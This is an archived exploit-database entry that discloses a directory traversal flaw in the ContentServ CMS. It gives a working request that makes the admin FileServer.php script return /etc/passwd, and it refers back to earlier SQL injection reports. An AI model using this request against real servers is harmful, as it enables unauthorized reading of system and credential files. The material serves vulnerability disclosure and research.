exploit-db-mirror/exploits/php/webapps/2878.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
645 B
Text

ContentServ again (still) features remote reading of arbitrary files
====================================================================
ContentServ is a cms and "cross media publishing" software.
Let me quote from their website:
"At ContentServ, there is always something happening. We continously enhance our products and services.[...]"
Ok.
Now for the real fun remember:
http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0650.html
Still with me? Ok. Lets forget the sql injections for a moment, what if we try:
http://somesite/contentserv/4.2/admin/FileServer.php?src=../../../../../etc/passwd
# milw0rm.com [2006-12-01]